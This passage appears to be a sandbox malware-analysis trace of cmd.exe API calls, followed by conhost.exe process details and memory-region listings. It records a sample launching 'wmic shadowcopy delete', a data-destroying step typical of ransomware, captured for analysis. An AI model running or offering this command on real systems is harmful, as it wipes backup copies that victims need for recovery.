	[0234.296] _wcsicmp (_String1="wmic", _String2="ENDLOCAL") returned 18
	[0234.296] _wcsicmp (_String1="wmic", _String2="TITLE") returned 3
	[0234.296] _wcsicmp (_String1="wmic", _String2="START") returned 4
	[0234.296] _wcsicmp (_String1="wmic", _String2="DPATH") returned 19
	[0234.296] _wcsicmp (_String1="wmic", _String2="KEYS") returned 12
	[0234.296] _wcsicmp (_String1="wmic", _String2="MOVE") returned 10
	[0234.296] _wcsicmp (_String1="wmic", _String2="PUSHD") returned 7
	[0234.296] _wcsicmp (_String1="wmic", _String2="POPD") returned 7
	[0234.297] _wcsicmp (_String1="wmic", _String2="ASSOC") returned 22
	[0234.297] _wcsicmp (_String1="wmic", _String2="FTYPE") returned 17
	[0234.297] _wcsicmp (_String1="wmic", _String2="BREAK") returned 21
	[0234.297] _wcsicmp (_String1="wmic", _String2="COLOR") returned 20
	[0234.297] _wcsicmp (_String1="wmic", _String2="MKLINK") returned 10
	[0234.297] _wcsicmp (_String1="wmic", _String2="FOR") returned 17
	[0234.297] _wcsicmp (_String1="wmic", _String2="IF") returned 14
	[0234.297] _wcsicmp (_String1="wmic", _String2="REM") returned 5
	[0234.298] GetProcessHeap () returned 0x46f0000
	[0234.298] RtlAllocateHeap (HeapHandle=0x46f0000, Flags=0x8, Size=0x210) returned 0x46f9030
	[0234.298] GetProcessHeap () returned 0x46f0000
	[0234.298] RtlAllocateHeap (HeapHandle=0x46f0000, Flags=0x8, Size=0x38) returned 0x46f9248
	[0234.298] _wcsnicmp (_String1="wmic", _String2="cmd ", _MaxCount=0x4) returned 20
	[0234.300] GetProcessHeap () returned 0x46f0000
	[0234.300] RtlAllocateHeap (HeapHandle=0x46f0000, Flags=0x8, Size=0x418) returned 0x46f05c8
	[0234.300] SetErrorMode (uMode=0x0) returned 0x0
	[0234.300] SetErrorMode (uMode=0x1) returned 0x0
	[0234.300] GetFullPathNameW (in: lpFileName=".", nBufferLength=0x208, lpBuffer=0x46f05d0, lpFilePart=0x18f1e4 | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\Desktop", lpFilePart=0x18f1e4*="Desktop") returned 0x1d
	[0234.300] SetErrorMode (uMode=0x0) returned 0x1
	[0234.301] GetProcessHeap () returned 0x46f0000
	[0234.301] RtlReAllocateHeap (Heap=0x46f0000, Flags=0x0, Ptr=0x46f05c8, Size=0x4e) returned 0x46f05c8
	[0234.301] GetProcessHeap () returned 0x46f0000
	[0234.301] RtlSizeHeap (HeapHandle=0x46f0000, Flags=0x0, MemoryPointer=0x46f05c8) returned 0x4e
	[0234.301] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x31f4a0, nSize=0x2000 | out: lpBuffer="") returned 0x9c
	[0234.301] NeedCurrentDirectoryForExePathW (ExeName=".") returned 1
	[0234.302] GetProcessHeap () returned 0x46f0000
	[0234.302] RtlAllocateHeap (HeapHandle=0x46f0000, Flags=0x8, Size=0x182) returned 0x46f9288
	[0234.302] GetProcessHeap () returned 0x46f0000
	[0234.302] RtlAllocateHeap (HeapHandle=0x46f0000, Flags=0x8, Size=0x2fc) returned 0x46f0620
	[0234.492] GetProcessHeap () returned 0x46f0000
	[0234.492] RtlReAllocateHeap (Heap=0x46f0000, Flags=0x0, Ptr=0x46f0620, Size=0x184) returned 0x46f0620
	[0234.492] GetProcessHeap () returned 0x46f0000
	[0234.492] RtlSizeHeap (HeapHandle=0x46f0000, Flags=0x0, MemoryPointer=0x46f0620) returned 0x184
	[0234.492] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x31f4a0, nSize=0x2000 | out: lpBuffer="") returned 0x35
	[0234.492] GetProcessHeap () returned 0x46f0000
	[0234.492] RtlAllocateHeap (HeapHandle=0x46f0000, Flags=0x8, Size=0xe0) returned 0x46f9418
	[0234.498] GetProcessHeap () returned 0x46f0000
	[0234.498] RtlReAllocateHeap (Heap=0x46f0000, Flags=0x0, Ptr=0x46f9418, Size=0x76) returned 0x46f9418
	[0234.498] GetProcessHeap () returned 0x46f0000
	[0234.498] RtlSizeHeap (HeapHandle=0x46f0000, Flags=0x0, MemoryPointer=0x46f9418) returned 0x76
	[0234.499] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3
	[0234.499] FindFirstFileExW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\Desktop\\wmic.*" (normalized: "c:\\users\\rdhj0cnfevzx\\desktop\\wmic.*"), fInfoLevelId=0x1, lpFindFileData=0x18ef70, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x18ef70) returned 0xffffffff
	[0234.500] GetLastError () returned 0x2
	[0234.500] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3
	[0234.500] FindFirstFileExW (in: lpFileName="C:\\Program Files (x86)\\Common Files\\Oracle\\Java\\javapath\\wmic.*" (normalized: "c:\\program files (x86)\\common files\\oracle\\java\\javapath\\wmic.*"), fInfoLevelId=0x1, lpFindFileData=0x18ef70, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x18ef70) returned 0xffffffff
	[0234.501] GetLastError () returned 0x2
	[0234.501] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3
	[0234.501] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\wmic.*" (normalized: "c:\\windows\\syswow64\\wmic.*"), fInfoLevelId=0x1, lpFindFileData=0x18ef70, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x18ef70) returned 0xffffffff
	[0234.502] GetLastError () returned 0x2
	[0234.503] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3
	[0234.503] FindFirstFileExW (in: lpFileName="C:\\Windows\\wmic.*" (normalized: "c:\\windows\\wmic.*"), fInfoLevelId=0x1, lpFindFileData=0x18ef70, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x18ef70) returned 0xffffffff
	[0234.503] GetLastError () returned 0x2
	[0234.503] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3
	[0234.504] FindFirstFileExW (in: lpFileName="C:\\Windows\\System32\\Wbem\\wmic.*" (normalized: "c:\\windows\\syswow64\\wbem\\wmic.*"), fInfoLevelId=0x1, lpFindFileData=0x18ef70, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x18ef70) returned 0x46f9498
	[0234.505] GetProcessHeap () returned 0x46f0000
	[0234.506] RtlAllocateHeap (HeapHandle=0x46f0000, Flags=0x0, Size=0x14) returned 0x46f78f8
	[0234.506] FindClose (in: hFindFile=0x46f9498 | out: hFindFile=0x46f9498) returned 1
	[0234.506] FindFirstFileExW (in: lpFileName="C:\\Windows\\System32\\Wbem\\WMIC.COM" (normalized: "c:\\windows\\syswow64\\wbem\\wmic.com"), fInfoLevelId=0x1, lpFindFileData=0x18ef70, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x18ef70) returned 0xffffffff
	[0234.506] GetLastError () returned 0x2
	[0234.507] FindFirstFileExW (in: lpFileName="C:\\Windows\\System32\\Wbem\\WMIC.EXE" (normalized: "c:\\windows\\syswow64\\wbem\\wmic.exe"), fInfoLevelId=0x1, lpFindFileData=0x18ef70, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x18ef70) returned 0x46f9498
	[0234.507] GetProcessHeap () returned 0x46f0000
	[0234.507] RtlReAllocateHeap (Heap=0x46f0000, Flags=0x0, Ptr=0x46f78f8, Size=0x4) returned 0x46f0578
	[0234.507] FindClose (in: hFindFile=0x46f9498 | out: hFindFile=0x46f9498) returned 1
	[0234.507] _wcsicmp (_String1=".EXE", _String2=".BAT") returned 3
	[0234.507] _wcsicmp (_String1=".EXE", _String2=".CMD") returned 2
	[0234.507] GetConsoleTitleW (in: lpConsoleTitle=0x18f464, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\System32\\cmd.exe") returned 0x1b
	[0234.825] InitializeProcThreadAttributeList (in: lpAttributeList=0x18f390, dwAttributeCount=0x1, dwFlags=0x0, lpSize=0x18f374 | out: lpAttributeList=0x18f390, lpSize=0x18f374) returned 1
	[0234.825] UpdateProcThreadAttribute (in: lpAttributeList=0x18f390, dwFlags=0x0, Attribute=0x60001, lpValue=0x18f37c, cbSize=0x4, lpPreviousValue=0x0, lpReturnSize=0x0 | out: lpAttributeList=0x18f390, lpPreviousValue=0x0) returned 1
	[0234.825] GetStartupInfoW (in: lpStartupInfo=0x18f3c8 | out: lpStartupInfo=0x18f3c8*(cb=0x44, lpReserved="", lpDesktop="WinSta0\\Default", lpTitle="C:\\Windows\\System32\\cmd.exe", dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x1, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0)) 
	[0234.825] GetProcessHeap () returned 0x46f0000
	[0234.825] RtlAllocateHeap (HeapHandle=0x46f0000, Flags=0x8, Size=0x18) returned 0x46f7738
	[0234.825] _wcsnicmp (_String1="COPYCMD", _String2="=C:=C:\\", _MaxCount=0x7) returned 38
	[0234.825] _wcsnicmp (_String1="COPYCMD", _String2="ALLUSER", _MaxCount=0x7) returned 2
	[0234.825] _wcsnicmp (_String1="COPYCMD", _String2="APPDATA", _MaxCount=0x7) returned 2
	[0234.826] _wcsnicmp (_String1="COPYCMD", _String2="CommonP", _MaxCount=0x7) returned 3
	[0234.826] _wcsnicmp (_String1="COPYCMD", _String2="CommonP", _MaxCount=0x7) returned 3
	[0234.826] _wcsnicmp (_String1="COPYCMD", _String2="CommonP", _MaxCount=0x7) returned 3
	[0234.826] _wcsnicmp (_String1="COPYCMD", _String2="COMPUTE", _MaxCount=0x7) returned 3
	[0234.826] _wcsnicmp (_String1="COPYCMD", _String2="ComSpec", _MaxCount=0x7) returned 3
	[0234.826] _wcsnicmp (_String1="COPYCMD", _String2="FPS_BRO", _MaxCount=0x7) returned -3
	[0234.826] _wcsnicmp (_String1="COPYCMD", _String2="FPS_BRO", _MaxCount=0x7) returned -3
	[0234.826] _wcsnicmp (_String1="COPYCMD", _String2="HOMEDRI", _MaxCount=0x7) returned -5
	[0234.826] _wcsnicmp (_String1="COPYCMD", _String2="HOMEPAT", _MaxCount=0x7) returned -5
	[0234.826] _wcsnicmp (_String1="COPYCMD", _String2="LOCALAP", _MaxCount=0x7) returned -9
	[0234.826] _wcsnicmp (_String1="COPYCMD", _String2="LOGONSE", _MaxCount=0x7) returned -9
	[0234.826] _wcsnicmp (_String1="COPYCMD", _String2="NUMBER_", _MaxCount=0x7) returned -11
	[0234.826] _wcsnicmp (_String1="COPYCMD", _String2="OS=Wind", _MaxCount=0x7) returned -12
	[0234.827] _wcsnicmp (_String1="COPYCMD", _String2="Path=C:", _MaxCount=0x7) returned -13
	[0234.827] _wcsnicmp (_String1="COPYCMD", _String2="PATHEXT", _MaxCount=0x7) returned -13
	[0234.827] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13
	[0234.827] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13
	[0234.827] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13
	[0234.827] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13
	[0234.827] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13
	[0234.827] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13
	[0234.827] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13
	[0234.827] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13
	[0234.827] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13
	[0234.827] _wcsnicmp (_String1="COPYCMD", _String2="PROMPT=", _MaxCount=0x7) returned -13
	[0234.827] _wcsnicmp (_String1="COPYCMD", _String2="PSModul", _MaxCount=0x7) returned -13
	[0234.827] _wcsnicmp (_String1="COPYCMD", _String2="PUBLIC=", _MaxCount=0x7) returned -13
	[0234.828] _wcsnicmp (_String1="COPYCMD", _String2="SystemD", _MaxCount=0x7) returned -16
	[0234.828] _wcsnicmp (_String1="COPYCMD", _String2="SystemR", _MaxCount=0x7) returned -16
	[0234.828] _wcsnicmp (_String1="COPYCMD", _String2="TEMP=C:", _MaxCount=0x7) returned -17
	[0234.828] _wcsnicmp (_String1="COPYCMD", _String2="TMP=C:\\", _MaxCount=0x7) returned -17
	[0234.828] _wcsnicmp (_String1="COPYCMD", _String2="USERDOM", _MaxCount=0x7) returned -18
	[0234.828] _wcsnicmp (_String1="COPYCMD", _String2="USERDOM", _MaxCount=0x7) returned -18
	[0234.828] _wcsnicmp (_String1="COPYCMD", _String2="USERNAM", _MaxCount=0x7) returned -18
	[0234.828] _wcsnicmp (_String1="COPYCMD", _String2="USERPRO", _MaxCount=0x7) returned -18
	[0234.828] _wcsnicmp (_String1="COPYCMD", _String2="windir=", _MaxCount=0x7) returned -20
	[0234.828] GetProcessHeap () returned 0x46f0000
	[0234.828] RtlFreeHeap (HeapHandle=0x46f0000, Flags=0x0, BaseAddress=0x46f7738) returned 1
	[0234.828] GetProcessHeap () returned 0x46f0000
	[0234.828] RtlAllocateHeap (HeapHandle=0x46f0000, Flags=0x8, Size=0xa) returned 0x46f0588
	[0234.829] lstrcmpW (lpString1="\\WMIC.exe", lpString2="\\XCOPY.EXE") returned -1
	[0234.833] CreateProcessW (in: lpApplicationName="C:\\Windows\\System32\\Wbem\\WMIC.exe", lpCommandLine="wmic  shadowcopy delete", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=1, dwCreationFlags=0x80000, lpEnvironment=0x0, lpCurrentDirectory="C:\\Users\\RDhJ0CNFevzX\\Desktop", lpStartupInfo=0x18f318*(cb=0x48, lpReserved=0x0, lpDesktop="WinSta0\\Default", lpTitle="wmic  shadowcopy delete", dwX=0x0, dwY=0x1, dwXSize=0x64, dwYSize=0x64, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x1, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x18f364 | out: lpCommandLine="wmic  shadowcopy delete", lpProcessInformation=0x18f364*(hProcess=0xa8, hThread=0xa4, dwProcessId=0xfd0, dwThreadId=0xfd4)) returned 1
	[0234.993] CloseHandle (hObject=0xa4) returned 1
	[0234.993] SetEnvironmentVariableW (lpName="COPYCMD", lpValue=0x0) returned 1
	[0234.993] GetProcessHeap () returned 0x46f0000
	[0234.993] RtlFreeHeap (HeapHandle=0x46f0000, Flags=0x0, BaseAddress=0x46fb818) returned 1
	[0234.993] GetEnvironmentStringsW () returned 0x46fa108*
	[0234.993] GetProcessHeap () returned 0x46f0000
	[0234.993] RtlAllocateHeap (HeapHandle=0x46f0000, Flags=0x8, Size=0xb9c) returned 0x46facb0
	[0234.993] memcpy (in: _Dst=0x46facb0, _Src=0x46fa108, _Size=0xb9c | out: _Dst=0x46facb0) returned 0x46facb0
	[0234.993] FreeEnvironmentStringsA (penv="=") returned 1
	[0234.993] WaitForSingleObject (hHandle=0xa8, dwMilliseconds=0xffffffff) returned 0x0
	[0291.309] GetExitCodeProcess (in: hProcess=0xa8, lpExitCode=0x18f2fc | out: lpExitCode=0x18f2fc*=0x80041014) returned 1
	[0291.311] CloseHandle (hObject=0xa8) returned 1
	[0291.311] _vsnwprintf (in: _Buffer=0x18f3e4, _BufferCount=0x13, _Format="%08X", _ArgList=0x18f304 | out: _Buffer="80041014") returned 8
	[0291.313] SetEnvironmentVariableW (lpName="=ExitCode", lpValue="80041014") returned 1
	[0291.313] GetProcessHeap () returned 0x46f0000
	[0291.314] RtlFreeHeap (HeapHandle=0x46f0000, Flags=0x0, BaseAddress=0x46facb0) returned 1
	[0291.314] GetEnvironmentStringsW () returned 0x46fa108*
	[0291.314] GetProcessHeap () returned 0x46f0000
	[0291.314] RtlAllocateHeap (HeapHandle=0x46f0000, Flags=0x8, Size=0xbc2) returned 0x46fc428
	[0291.314] memcpy (in: _Dst=0x46fc428, _Src=0x46fa108, _Size=0xbc2 | out: _Dst=0x46fc428) returned 0x46fc428
	[0291.315] FreeEnvironmentStringsA (penv="=") returned 1
	[0291.315] SetEnvironmentVariableW (lpName="=ExitCodeAscii", lpValue=0x0) returned 1
	[0291.315] GetProcessHeap () returned 0x46f0000
	[0291.315] RtlFreeHeap (HeapHandle=0x46f0000, Flags=0x0, BaseAddress=0x46fc428) returned 1
	[0291.315] GetEnvironmentStringsW () returned 0x46fa108*
	[0291.315] GetProcessHeap () returned 0x46f0000
	[0291.315] RtlAllocateHeap (HeapHandle=0x46f0000, Flags=0x8, Size=0xbc2) returned 0x46fc428
	[0291.315] memcpy (in: _Dst=0x46fc428, _Src=0x46fa108, _Size=0xbc2 | out: _Dst=0x46fc428) returned 0x46fc428
	[0291.316] FreeEnvironmentStringsA (penv="=") returned 1
	[0291.316] GetProcessHeap () returned 0x46f0000
	[0291.316] RtlFreeHeap (HeapHandle=0x46f0000, Flags=0x0, BaseAddress=0x46f0588) returned 1
	[0291.316] DeleteProcThreadAttributeList (in: lpAttributeList=0x18f390 | out: lpAttributeList=0x18f390) 
	[0291.316] _get_osfhandle (_FileHandle=1) returned 0x3c
	[0291.316] SetConsoleMode (hConsoleHandle=0x3c, dwMode=0x7) returned 1
	[0291.698] _get_osfhandle (_FileHandle=1) returned 0x3c
	[0291.698] GetConsoleMode (in: hConsoleHandle=0x3c, lpMode=0x31f40c | out: lpMode=0x31f40c) returned 1
	[0291.928] _get_osfhandle (_FileHandle=0) returned 0x38
	[0291.928] GetConsoleMode (in: hConsoleHandle=0x38, lpMode=0x31f408 | out: lpMode=0x31f408) returned 1
	[0292.712] SetConsoleInputExeNameW () returned 0x1
	[0292.712] GetConsoleOutputCP () returned 0x1b5
	[0293.002] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x31f460 | out: lpCPInfo=0x31f460) returned 1
	[0293.003] SetThreadUILanguage (LangId=0x0) returned 0x409
	[0293.308] exit (_Code=-2147217388) 

Thread:
	id = 44
	os_tid = 0x1310


Process:
	id = "5"
	image_name = "conhost.exe"
	filename = "c:\\windows\\system32\\conhost.exe"
	page_root = "0x344bb000"
	os_pid = "0x12d8"
	os_integrity_level = "0x3000"
	os_privileges = "0x60800000"
	monitor_reason = "child_process"
	parent_id = "4"
	os_parent_pid = "0x12ec"
	cmd_line = "\\??\\C:\\Windows\\system32\\conhost.exe 0xffffffff -ForceV1"
	cur_dir = "C:\\Windows"
	os_username = "XC64ZB\\RDhJ0CNFevzX"
	bitness = "32"
	os_groups = "XC64ZB\\Domain Users" [0x7], "Everyone" [0x7], "NT AUTHORITY\\Local account and member of Administrators group" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Local account" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000f1a9" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7]

Region:
	              id = 499
	        start_va = 0x1a400000
	          end_va = 0x1a5fffff
	       monitored = 1
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x000000001a400000"
	        filename = ""

Region:
	              id = 500
	        start_va = 0x7ffe0000
	          end_va = 0x7ffeffff
	       monitored = 1
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x000000007ffe0000"
	        filename = ""

Region:
	              id = 501
	        start_va = 0x8bda2d0000
	          end_va = 0x8bda30ffff
	       monitored = 1
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x0000008bda2d0000"
	        filename = ""

Region:
	              id = 502
	        start_va = 0x8bda400000
	          end_va = 0x8bda5fffff
	       monitored = 1
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x0000008bda400000"
	        filename = ""

Region:
	              id = 503
	        start_va = 0x24dcd1c0000
	          end_va = 0x24dcd1dffff
	       monitored = 1
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x0000024dcd1c0000"
	        filename = ""

Region:
	              id = 504
	        start_va = 0x24dcd1e0000
	          end_va = 0x24dcd1f4fff
	       monitored = 1
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x0000024dcd1e0000"
	        filename = ""

Region:
	              id = 505
	        start_va = 0x7df5ff050000
	          end_va = 0x7ff5ff04ffff
	       monitored = 1
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x00007df5ff050000"
	        filename = ""

Region:
	              id = 506
	        start_va = 0x7ff7ff6e0000
	          end_va = 0x7ff7ff702fff
	       monitored = 1
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x00007ff7ff6e0000"
	        filename = ""

Region:
	              id = 507
	        start_va = 0x7ff7ffcf0000
	          end_va = 0x7ff7ffd00fff
	       monitored = 0
	     entry_point = 0x7ff7ffcf16b0
	     region_type = mapped_file
	            name = "conhost.exe"
	        filename = "\\Windows\\System32\\conhost.exe" (normalized: "c:\\windows\\system32\\conhost.exe")

Region:
	              id = 508
	        start_va = 0x7ff95ae70000
	          end_va = 0x7ff95b030fff
	       monitored = 0
	     entry_point = 0x0
	     region_type = mapped_file
	            name = "ntdll.dll"
	        filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll")

Region:
	              id = 509
	        start_va = 0x24dcd200000
	          end_va = 0x24dcd31ffff
	       monitored = 1
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x0000024dcd200000"
	        filename = ""

Region:
	              id = 510
	        start_va = 0x7ff958860000
	          end_va = 0x7ff95890cfff
	       monitored = 0
	     entry_point = 0x7ff9588781a0
	     region_type = mapped_file
	            name = "kernel32.dll"
	        filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll")

Region:
	              id = 514
	        start_va = 0x7ff9575b0000
	          end_va = 0x7ff957797fff
	       monitored = 0
	     entry_point = 0x7ff9575dba70
	     region_type = mapped_file
	            name = "kernelbase.dll"
	        filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll")

Region:
	              id = 515
	        start_va = 0x24dcd1c0000
	          end_va = 0x24dcd1cffff
	       monitored = 1
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x0000024dcd1c0000"
	        filename = ""

Region:
	              id = 516
	        start_va = 0x7ff7ff5e0000
	          end_va = 0x7ff7ff6dffff
	       monitored = 1
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x00007ff7ff5e0000"
	        filename = ""

Region:
	              id = 517
	        start_va = 0x24dcd320000
	          end_va = 0x24dcd3ddfff
	       monitored = 0
	     entry_point = 0x0
	     region_type = mapped_file
	            name = "locale.nls"
	        filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls")

Region:
	              id = 518
	        start_va = 0x7ff9586a0000
	          end_va = 0x7ff95873cfff
	       monitored = 0
	     entry_point = 0x7ff9586a78a0
	     region_type = mapped_file
	            name = "msvcrt.dll"
	        filename = "\\Windows\\System32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll")

Region:
	              id = 519
	        start_va = 0x8bda310000
	          end_va = 0x8bda34ffff
	       monitored = 1
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x0000008bda310000"
	        filename = ""

Region:
	              id = 520
	        start_va = 0x24dcd3e0000
	          end_va = 0x24dcd4cffff
	       monitored = 1
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x0000024dcd3e0000"
	        filename = ""

Region:
	              id = 524
	        start_va = 0x24dcd1d0000
	          end_va = 0x24dcd1d6fff
	       monitored = 1
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x0000024dcd1d0000"
	        filename = ""

Region:
	              id = 525
	        start_va = 0x7ff955c90000
	          end_va = 0x7ff955ce8fff
	       monitored = 0
	     entry_point = 0x7ff955c9fbf0
	     region_type = mapped_file
	            name = "conhostv2.dll"
	        filename = "\\Windows\\System32\\ConhostV2.dll" (normalized: "c:\\windows\\system32\\conhostv2.dll")

Region:
	              id = 526
	        start_va = 0x24dcd200000
	          end_va = 0x24dcd200fff
	       monitored = 1
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x0000024dcd200000"
	        filename = ""

Region:
	              id = 527
	        start_va = 0x24dcd220000
	          end_va = 0x24dcd31ffff
	       monitored = 1
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x0000024dcd220000"
	        filename = ""

Region:
	              id = 528
	        start_va = 0x7ff95a8f0000
	          end_va = 0x7ff95ab6cfff
	       monitored = 0
	     entry_point = 0x7ff95a9c4970
	     region_type = mapped_file
	            name = "combase.dll"
	        filename = "\\Windows\\System32\\combase.dll" (normalized: "c:\\windows\\system32\\combase.dll")

Region:
	              id = 529
	        start_va = 0x7ff9583d0000
	          end_va = 0x7ff9584ebfff
	       monitored = 0
	     entry_point = 0x7ff9584102b0
	     region_type = mapped_file
	            name = "rpcrt4.dll"
	        filename = "\\Windows\\System32\\rpcrt4.dll" (normalized: "c:\\windows\\system32\\rpcrt4.dll")

Region:
	              id = 530
	        start_va = 0x7ff958130000
	          end_va = 0x7ff958199fff
	       monitored = 0
	     entry_point = 0x7ff958166d50
	     region_type = mapped_file
	            name = "bcryptprimitives.dll"
	        filename = "\\Windows\\System32\\bcryptprimitives.dll" (normalized: "c:\\windows\\system32\\bcryptprimitives.dll")

Region:
	              id = 531
	        start_va = 0x7ff95ad00000
	          end_va = 0x7ff95ae55fff
	       monitored = 0
	     entry_point = 0x7ff95ad0a8d0
	     region_type = mapped_file
	            name = "user32.dll"
	        filename = "\\Windows\\System32\\user32.dll" (normalized: "c:\\windows\\system32\\user32.dll")

Region:
	              id = 532
	        start_va = 0x7ff95ab70000
	          end_va = 0x7ff95acf5fff
	       monitored = 0
	     entry_point = 0x7ff95abbffc0
	     region_type = mapped_file
	            name = "gdi32.dll"
	        filename = "\\Windows\\System32\\gdi32.dll" (normalized: "c:\\windows\\system32\\gdi32.dll")

Region:
	              id = 533
	        start_va = 0x24dcd210000
	          end_va = 0x24dcd216fff
	       monitored = 1
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x0000024dcd210000"
	        filename = ""

Region:
	              id = 534
	        start_va = 0x7ff958280000
	          end_va = 0x7ff9583c2fff
	       monitored = 0
	     entry_point = 0x7ff9582a8210
	     region_type = mapped_file
	            name = "ole32.dll"
	        filename = "\\Windows\\System32\\ole32.dll" (normalized: "c:\\windows\\system32\\ole32.dll")

Region:
	              id = 538
	        start_va = 0x7ff959330000
	          end_va = 0x7ff95938afff
	       monitored = 0
	     entry_point = 0x7ff9593438b0
	     region_type = mapped_file
	            name = "sechost.dll"
	        filename = "\\Windows\\System32\\sechost.dll" (normalized: "c:\\windows\\system32\\sechost.dll")

Region:
	              id = 539
	        start_va = 0x7ff958820000
	          end_va = 0x7ff95885afff
	       monitored = 0
	     entry_point = 0x7ff9588212f0
	     region_type = mapped_file
	            name = "imm32.dll"
	        filename = "\\Windows\\System32\\imm32.dll" (normalized: "c:\\windows\\system32\\imm32.dll")

Region:
	              id = 540
	        start_va = 0x7ff958ba0000
	          end_va = 0x7ff958c60fff
	       monitored = 0
	     entry_point = 0x7ff958bc0da0
	     region_type = mapped_file
	            name = "oleaut32.dll"
	        filename = "\\Windows\\System32\\oleaut32.dll" (normalized: "c:\\windows\\system32\\oleaut32.dll")

Region:
	              id = 541
	        start_va = 0x7ff9559b0000
	          end_va = 0x7ff955b35fff
	       monitored = 0
	     entry_point = 0x7ff9559fd700
	     region_type = mapped_file
	            name = "propsys.dll"
	        filename = "\\Windows\\System32\\propsys.dll" (normalized: "c:\\windows\\system32\\propsys.dll")

Region:
	              id = 572
	        start_va = 0x24dcd3e0000
	          end_va = 0x24dcd3e0fff
	       monitored = 1
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x0000024dcd3e0000"
	        filename = ""

Region:
	              id = 573
	        start_va = 0x24dcd3f0000
	          end_va = 0x24dcd3f0fff
	       monitored = 1
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x0000024dcd3f0000"
	        filename = ""

Region:
	              id = 574
	        start_va = 0x24dcd4c0000
	          end_va = 0x24dcd4cffff
	       monitored = 1
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x0000024dcd4c0000"
	        filename = ""

Region:
	              id = 575
	        start_va = 0x24dcd4d0000
	          end_va = 0x24dcd657fff
	       monitored = 1
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x0000024dcd4d0000"
	        filename = ""

Region:
	              id = 576
	        start_va = 0x24dcd660000
	          end_va = 0x24dcd7e0fff
	       monitored = 1
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x0000024dcd660000"
	        filename = ""

Region:
	              id = 577
	        start_va = 0x24dcd7f0000
	          end_va = 0x24dcebeffff
	       monitored = 1
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x0000024dcd7f0000"
	        filename = ""

Region:
	              id = 578
	        start_va = 0x24dcebf0000
	          end_va = 0x24dced1ffff
	       monitored = 1
